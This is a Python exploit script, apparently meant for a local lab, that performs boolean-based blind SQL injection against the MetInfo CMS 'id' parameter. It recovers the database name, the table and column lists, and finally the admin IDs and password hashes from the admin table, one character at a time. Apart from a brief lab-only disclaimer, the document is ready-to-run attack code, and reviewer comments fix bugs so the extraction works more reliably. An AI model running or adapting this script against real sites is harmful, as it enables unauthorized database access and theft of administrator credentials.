部署环境(本地靶场):XAMPP、MetInfo — lab target only: run this script solely against systems you are explicitly authorized to test.
# metinfo-sqlmap.py — boolean-based blind SQL injection against the MetInfo `id` parameter
# NOTE: the position loop must stay the outer loop and the character loop the inner one;
# swapping their nesting order makes the script print the whole a-z charset instead of the extracted value.
import requests,string
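number = string.printable.strip()
field = "13300000000"
url = "http://***/Metinfo/about/"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0"
}

# Table holding MetInfo admin credentials. The original payload spelled it as
# the hex literal 0x6d65745f61646d696e5f7461626c65 so that the injected query
# needs no quote characters; hex_literal() rebuilds that form.
ADMIN_TABLE = "met_admin_table"

# Per-request timeout in seconds: without one a stalled target hangs the whole scan.
REQUEST_TIMEOUT = 10

# Upper bounds for the length searches (exclusive, like range()).
MAX_DB_NAME_LEN = 20
MAX_NAME_LIST_LEN = 400
# NOTE(review): 50 characters is only enough for a single short admin row;
# raise it when several admins exist. group_concat() is additionally capped by
# the server's group_concat_max_len (1024 bytes by default), so a long dump
# may be truncated regardless of this bound.
MAX_ADMIN_DUMP_LEN = 50

# Subquery listing every table in the current database, comma-separated.
TABLES_EXPR = (
    "(select group_concat(table_name) from information_schema.tables "
    "where table_schema=database())"
)


def hex_literal(text: str) -> str:
    """Return *text* as a MySQL hex literal (``0x...``) so it needs no quotes."""
    return "0x" + text.encode().hex()


def build_url(condition: str) -> str:
    """Return the probe URL that ANDs *condition* onto the vulnerable ``id`` parameter.

    ``--+`` comments out the remainder of the original query (``+`` decodes to
    a space, which MySQL requires after ``--``).
    """
    return url + f"show.php?lang=cn&id=22 and {condition} --+"


def oracle(condition: str) -> bool:
    """Send one probe and report whether *condition* evaluated true on the server.

    Assumes the marker in ``field`` is rendered only when the injected
    condition holds (true page vs. false page), so its presence in the body is
    the boolean oracle.  Raises ``requests`` exceptions on network failure or
    timeout rather than reporting a bogus ``False``.
    """
    res = requests.get(url=build_url(condition), headers=headers, timeout=REQUEST_TIMEOUT)
    return field in res.text


def find_length(expr: str, max_len: int, *, probe=oracle) -> int:
    """Return the length of SQL expression *expr* using ``length(expr)=N`` probes.

    Tries every N in ``range(max_len)`` and returns the first the oracle
    confirms.  Raises RuntimeError when no N matches, instead of leaving the
    result undefined (the original loop then crashed later with NameError).
    """
    for length in range(max_len):
        if probe(f"length({expr})={length}"):
            return length
    raise RuntimeError(f"length of {expr} not found below {max_len}")


def extract_string(expr: str, length: int, *, charset: str = number, probe=oracle, label: str = "") -> str:
    """Recover *length* characters of SQL expression *expr*, one position at a time.

    For each position every character of *charset* is tried with an
    ``ascii(substr(expr,pos,1))=code`` probe (linear scan, so roughly
    ``len(charset)`` requests per character).  A position matching nothing
    (e.g. a character outside *charset*) is recorded as ``?`` so later
    positions do not shift; the original silently dropped it.  When *label*
    is given the partial result is printed after each character, matching the
    original's progress output.
    """
    recovered = []
    for pos in range(1, length + 1):
        for ch in charset:
            if probe(f"ascii(substr({expr},{pos},1))={ord(ch)}"):
                recovered.append(ch)
                break
        else:
            recovered.append("?")
        if label:
            print(f"{label}:{''.join(recovered)}")
    return "".join(recovered)


def main() -> None:
    """Run the four-stage blind extraction: db name, table list, admin columns, admin rows.

    Only run against a target you are authorized to test; every probe is a
    logged HTTP request carrying an obvious injection payload.
    """
    db_len = find_length("database()", MAX_DB_NAME_LEN)
    print(f"数据库长度:{db_len}")
    # The original hard-coded range(1, 8) here; use the length just recovered.
    extract_string("database()", db_len, label="数据库名")

    tables_len = find_length(TABLES_EXPR, MAX_NAME_LIST_LEN)
    print(f"数据库表名长度:{tables_len}")
    extract_string(TABLES_EXPR, tables_len, label="数据库表名")

    columns_expr = (
        "(select group_concat(column_name) from information_schema.columns "
        f"where table_schema=database() and table_name={hex_literal(ADMIN_TABLE)})"
    )
    columns_len = find_length(columns_expr, MAX_NAME_LIST_LEN)
    print(f"数据库列名长度:{columns_len}")
    # Bug fix: the original bounded this loop by the *table list* length.
    extract_string(columns_expr, columns_len, label="数据库列名")

    # 0x2d2d is "--", separating id and password hash in each row.  The same
    # expression is used for the length probe and the extraction: the original
    # measured group_concat(admin_id,admin_pass) (no separator) and so came up
    # two characters short per row.
    dump_expr = f"(select group_concat(admin_id,{hex_literal('--')},admin_pass) from {ADMIN_TABLE})"
    dump_len = find_length(dump_expr, MAX_ADMIN_DUMP_LEN)
    print(f"数据库列名字段长度:{dump_len}")
    # Bug fix: the original bounded this loop by the *column list* length.
    extract_string(dump_expr, dump_len, label="数据库列名字段")


if __name__ == "__main__":
    main()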